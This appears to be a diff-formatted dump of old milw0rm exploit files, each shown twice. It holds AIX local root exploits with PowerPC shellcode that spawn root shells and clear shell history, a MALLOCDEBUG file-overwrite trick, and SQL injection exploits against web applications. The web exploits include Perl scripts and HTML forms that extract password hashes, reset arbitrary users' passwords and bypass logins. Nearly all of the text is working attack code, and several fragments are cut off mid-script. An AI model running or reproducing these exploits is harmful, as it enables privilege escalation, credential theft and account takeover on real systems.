perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX capture Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs);
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]

View file

@ -1,29 +1,29 @@
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]

View file

@ -1,157 +1,157 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX ftp Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/ftp"
#define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}
printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}
addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);
fflush(stdout);
fflush(stderr);
close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX ftp Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/ftp"
#define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}
printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}
addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);
fflush(stdout);
fflush(stderr);
close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]

View file

@ -20,6 +20,6 @@ export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
# milw0rm.com [2005-03-25]
exec /tmp/ksh
# milw0rm.com [2005-03-25]

View file

@ -1,33 +1,33 @@
#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################
Set the following environment variables:
umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30]
#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################
Set the following environment variables:
umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30]

View file

@ -35,6 +35,6 @@ unsigned int code[]={
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
*/
# milw0rm.com [2004-09-26]

View file

@ -71,6 +71,6 @@ print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
### EOF ###
# milw0rm.com [2005-05-26]
### EOF ###
# milw0rm.com [2005-05-26]

View file

@ -30,6 +30,6 @@ print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name=
print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
print "</form>";
}
?>
# milw0rm.com [2005-05-26]
?>
# milw0rm.com [2005-05-26]

View file

@ -33,6 +33,6 @@ size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
# milw0rm.com [2005-05-26]
-----------------End-------------------
# milw0rm.com [2005-05-26]

View file

@ -32,6 +32,6 @@ firstname : <input name="firstname" value="Crkchat" type="text" size="50">
<!--
-----------------------------------
Now u can use forgot password to gain passwords! -->
# milw0rm.com [2005-05-27]
Now u can use forgot password to gain passwords! -->
# milw0rm.com [2005-05-27]

View file

@ -47,6 +47,6 @@ print "Wait For Changing Password ...\n";
print "[+]OK , Now Login With : \n";
print "Username: trapset\n";
print "Password: trapset\n\n";
# milw0rm.com [2005-06-27]
# milw0rm.com [2005-06-27]

View file

@ -23,6 +23,6 @@ $page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin
print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
# milw0rm.com [2005-06-27]
print "[-] Unable to retrieve hash of password\n" if(!$1);
# milw0rm.com [2005-06-27]

View file

@ -104,6 +104,6 @@ hostcustid: <input type="TEXT" name="hostcustid" ID="hostcustid" value="1"><tr>
</td>
</tr>
</table>
</form>
# milw0rm.com [2005-07-18]
</form>
# milw0rm.com [2005-07-18]

View file

@ -1,44 +1,44 @@
<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
Some SQL Examples:
-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord
Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2
-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->
<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>
# milw0rm.com [2005-10-15]
<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
Some SQL Examples:
-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord
Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2
-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->
<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>
# milw0rm.com [2005-10-15]

View file

@ -1,59 +1,59 @@
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp;
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
</table></form>
</html>
[/code]
# milw0rm.com [2006-01-14]
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp;
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
</table></form>
</html>
[/code]
# milw0rm.com [2006-01-14]

View file

@ -1,53 +1,53 @@
#!/usr/bin/perl
# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
# This exploit uses the vulnerability discovered by nukedx@nukedx.com.
# Exploit uses SQl-injection to give you the hash from user with chosen id.
# DetMyl, 2006 Detmyl@bk.ru
use IO::Socket;
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
$proxy = $ARGV[3];
print "----------------------------------\n";
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
($proxyAddr,$proxyPort) = split(/:/, $proxy);
}
$serv =~ s/(http:\/\/)//eg;
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
print "Connecting to: $serv...\n";
print $proxy?"Using proxy: $proxy \n":"";
$socket = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$socket>) {
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n";
exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
}
print "Exploit failed\n";
print "--------------------------\n";
# milw0rm.com [2006-01-14]
#!/usr/bin/perl
# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
# This exploit uses the vulnerability discovered by nukedx@nukedx.com.
# Exploit uses SQl-injection to give you the hash from user with chosen id.
# DetMyl, 2006 Detmyl@bk.ru
use IO::Socket;
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
$proxy = $ARGV[3];
print "----------------------------------\n";
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
($proxyAddr,$proxyPort) = split(/:/, $proxy);
}
$serv =~ s/(http:\/\/)//eg;
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
print "Connecting to: $serv...\n";
print $proxy?"Using proxy: $proxy \n":"";
$socket = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$socket>) {
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n";
exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
}
print "Exploit failed\n";
print "--------------------------\n";
# milw0rm.com [2006-01-14]

View file

@ -1,93 +1,93 @@
#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email = zodiac@g00ns.net
#(c) 2006
use LWP::UserAgent;
use HTTP::Cookies;
$Server = $ARGV[0];
if($Server =~m/http/g)
{
$Server=~ 'http://$Server';
print
}
else {
print $error;
}
if(!$Server) {usage();exit() ;}
head();
print "\r\nGrabbing Username And Password\r\n\n";
#Login's and stores a cookie to view admin panel later
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar);
$res = $xpl->post(
$Server.'check_user.asp',
Content => [
'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'Submit' => '-= Login =-',
],
);
# Create a request
my $req = HTTP::Request->new(GET =>
$Server.'change_admin_username.asp'
);
$req->header('Referer', $Server.'admin_menu.asp');
my $res = $xpl->request($req);
$info= $res->content;
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{
die "Error Connecting...\r\n";
}
#Check the outcome of the response
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$User = $2;
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$Pass= $2;
print "UserName:$User\r\nPassword:$Pass\r\n";
sub head()
{
print "\n=======================================================================\r\n";
